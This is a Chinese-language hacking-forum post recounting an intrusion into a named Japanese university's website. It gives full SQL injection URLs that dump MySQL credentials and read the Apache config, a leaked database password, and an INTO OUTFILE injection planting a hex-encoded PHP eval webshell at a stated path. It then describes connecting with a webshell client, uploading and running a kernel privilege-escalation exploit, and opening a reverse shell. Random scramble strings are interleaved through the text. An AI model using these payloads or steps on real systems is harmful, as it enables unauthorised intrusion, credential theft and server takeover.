入侵日本同志社大学

admin

入侵日本同志社大学技术分析
" i  W( ~1 L' V
http://www.doshisha.ac.jp/chs/news/index.php?i=-1
然后联合查询，猜字段，查版本，查密码，读取文件…….就是各种查啊，语句是：
, F) t& M! @- Q
' Y' m' d% m$ Z0 B2 J' Fhttp://www.doshisha.ac.jp/chs/news/index.php?i=-1+union+select+1,@@datadir,3,load_file(‘/etc/httpd/conf/httpd.conf’),5,group_concat(DISTINCT+user,0x3a,password,0x3a,file_priv,0x3a,host),7,8+from+mysql.user
; Z  @. u( z, v2 ?


//@@datadir为数据库文件路径

9 m: t2 }7 L6 w
//load_file读取网站容器apache的配置文件

! `+ N% @+ |: f6 n0 |3 p( ^
//group_concat读取MySQL管理员的名字、密码、是否允许读写文件和允许登录的远程计算机
复制代码

0 l! S2 J# C& `2 z0 w, Y3 R: c虽然解得MySQL的root账户密码为mysql00，但是host为localhost，只允许本机登陆，所以用处不大。
( S' e/ A8 J7 f# q5 a2 H$ D
2 [% s/ m7 ~. _* e而且Apache的配置文件显示，服务器拒绝非该大学的ip访问/admin/和phpMyAdmin，所以即使爆出管理员账户密码也没用。
(大家对以上各种查和语句不太懂的可以参考以下文章：http://bbs.blackbap.org/thread-2243-1-1.html)
9 W2 e7 k: N; V% t" W, R7 w
' a  [9 r, e" Z& Q0 Q前面load_file是因为发现了各文件夹权限限制的死，不允许外校ip登陆，所以就猜了一下apache的配置文件绝对路径为默认，后来发现还真的是默认的路径。
如果知道怎么猜apache配置文件的路径的请参考以下文章：http://bbs.blackbap.org/thread-2242-1-1.html
8 Q5 c& `& K3 j$ ^8 o5 V: i
  F, z7 K, _0 u/ P( }既然已经知道了Apache的配置文件的内容，我们也就轻易知道了网站物理路径，路径为：/http/www/koho/
虽然/admin和phpMyAdmin的目录都限制了，但是想了想，我们只要有注入点就可以可以写入shell了，因为php的GPC为off，怎么判断为off我就不说了。
直接写一句话：

' }0 f: f( N% _, E- G3 lhttp://www.doshisha.ac.jp/chs/news/index.php?i=-1+union+select+ 0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E,0x3c3f2f2a,3,4,5,6,7,0x2a2f3f3e+into+outfile+’/http/www/koho/english/engnews_img/aa.php’#
+ v9 h  _' \  H4 D0 E/ m5 ~- M. g
% d  A% v: j) \4 j

//最后的#是为了闭合前面的语句

$ I) Y& s! [: f* u
/*其中的0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E
0 d# f5 J. B$ V  y; w* I2 t9 ?
4 W+ Q3 L) o' j1 D8 H: S4 b7 q
  g) Z4 B6 N# b" F. Z/ y4 N3 _为一句话<?php @eval($_POST['cmd']);?>的HEX编码，不懂(HEX编码)的话Google一下就好*/
: ^" t( p1 o% s

//如果直接select 一句话 into outfile ‘路径’会提示字段数不同，所以select 1,2,3,4…来执行注入语句


//后面的0x3c3f2f2a和0x2a2f3f3e分别为’<?php //’的和’?>’HEX因为select后面的3,4,5,6会被写入webshell中，可能会导致一句话执行错误
. t; D/ q" n9 D" @8 j' Z7 Q3 s% L0 ]//所以最后aa.php的内容就是”<?php @eval($_POST['cmd']);?><?php //3,4,5,6,7 ?>”
- O* F/ l" }- A% n复制代码

( H% M; _: X2 ^% C9 b) PHEX其实就是十六进制编码，不知道这个编码的话，去搜一下好了，HEX编码转换在线本地各种工具各种有
! C6 ]. E% L1 o& W8 X& k* p通过上述注入语句，我们就得到了一句话木马:




$ |% W1 A7 c( s% J. b
/ k& f" t6 p6 l, R% a1 e+ q' phttp://www.doshisha.ac.jp/english/engnews_img/aa.php
( k& ]1 i3 e$ `9 _& @* Y复制代码
( b5 K' [6 F- w$ q. G, K9 o8 A
# K" t3 c+ i/ k& J1 l用菜刀连接，密码是cmd，如图所示：
: o5 n  U! V* J然后在命令提示行里看了一下，现在的权限是：

1 T8 f+ t1 g. C1 K) @8 H; B5 t7 b之后按照惯例我看了一下/tmp/文件夹，发现/TMP/权限居然被禁掉了，很少有服务器禁掉这个文件夹的。
好在赋权给这个文件夹不需要root，直接执行赋权语句：
  z7 A7 e1 I; }9 P* E' s, }

5 X, }4 S9 R0 [! ~  E! ]

8 t3 Z5 b  q0 m8 b9 q
) q2 e* a3 ~6 l8 W2 y9 @8 N6 Y6 tchmod +x /tmp/
复制代码

在这说一下，linux里面的文件夹跟文件一样，执行命令自然也可以按照像文件一样的执行
7 }! @! y% m! W2 V, e1 m+ Y然后就查了一下内核版本：

/ P# V( h2 M7 O, v* b; Q$ h
" ?0 D1 k* A. X* t& n" P


% s5 b* a$ d( I6 j0 H+ cuname-a


  D$ R2 j# W/ p5 }$ k& _" v& b//其实lsb_release -a
! O& A3 V& ?- R1 v复制代码

# P- n0 V4 n' y: Z如图所示：

内核版本：linux mainz1 2.6.28-194.e15
系统描述为：Red Hat Enterprise Linux Server release 5.5 (Tikanga)
查完了系统版本之后就去找找相应的提权脚本！~然后传到/tmp/文件夹

然后给予执行权限
& H, }9 Y4 Z$ ]0 I+ m7 j* X3 }一般我都是传上去c源文件，然后”gcc -o /tmp/程序 /tmp/C源码”这样，如果gcc不能用，在其他机器编译好了直接传上去其实也可以，就像这样
' r+ Y9 k, ]# {5 |  h/ U, j; }* F/ y


) E- x2 N* R- [5 X7 H: [& D

; ]" A2 q2 |- Z! O! u. W5 rchmod +x /tmp/2.6.18-194
% H! z5 B4 Z) g1 J复制代码 然后直接执行！~
& s- d2 x0 l3 ]+ ?! x0 s0 Q  A$ e6 j
6 ]7 ?3 B3 q$ O9 W8 b4 z总结：
5 I% C9 o4 l* {这个注入点的基本思路就是，发现MySQL账户为root，GPC设置为off，搞到了物理路径就直接写Webshell了
提权部分原理就是，本地监听端口，将对方机器反弹回cmdshell来，然后把和内核版本对应的EXP传上去，编译运行，得到root